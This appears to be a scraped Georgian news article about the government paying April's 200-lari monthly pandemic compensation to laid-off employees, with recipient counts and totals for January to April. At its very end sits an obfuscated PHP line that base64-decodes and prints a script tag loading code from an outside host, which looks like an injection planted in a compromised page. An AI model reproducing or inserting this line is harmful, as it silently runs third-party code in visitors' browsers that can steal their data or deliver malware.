celsiusi
ავერსი შნაიდერი
დაქირავებით დასაქმებულთათვის აპრილის თვის 200 ლარიანი კომპენსაციის გაცემა დაიწყო. ინფორმაციას სსიპ დასაქმების ხელშეწყობის სახელმწიფო სააგენტო ავრცელებს.
 
უწყების ცნობით, გრძელდება მოქალაქეების მიზნობრივი სოციალური დახმარების გაცემა, მათ შორის მოქალაქეებისთვის, რომლებმაც პანდემიის მე-2 ტალღის შედეგად დაკარგეს სამსახური.
 
„დღეისათვის, 200-ლარიანი დახმარების აპრილის თვის ჩარიცხვა უკვე დაწყებულია, კომპენსაცია ჩაერიცხება 120 496 პირს, 24 099 200 ლარის ოდენობით.
 
დღეის მდგომარეობით, მარტის თვის 200-ლარიანი დახმარება ჩაერიცხა 130 683 პირს, 26 136 600 ლარის ოდენობით, თებერვლის თვის - 140 029 პირს, 28 005 800 ლარის ოდენობით. რაც შეეხება იანვრის თვეს, საკომპენსაციო თანხა ჩაერიცხა 106 389 პირს, 21 277 800 ლარის ოდენობით“, - ნათქვამია სააგენტოს ინფორმაციაში.
 
შეგახსენებთ, საქართველოს მთავრობის ანტიკრიზისული ეკონომიკური გეგმის ფარგლებში, 2021 წლის იანვრიდან, დაქირავებით დასაქმებული უმუშევრად დარჩენილი მოქალაქეები 6 თვის განმავლობაში ყოველთვიურად 200-ლარიან დახმარებას მიიღებენ.
1463
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");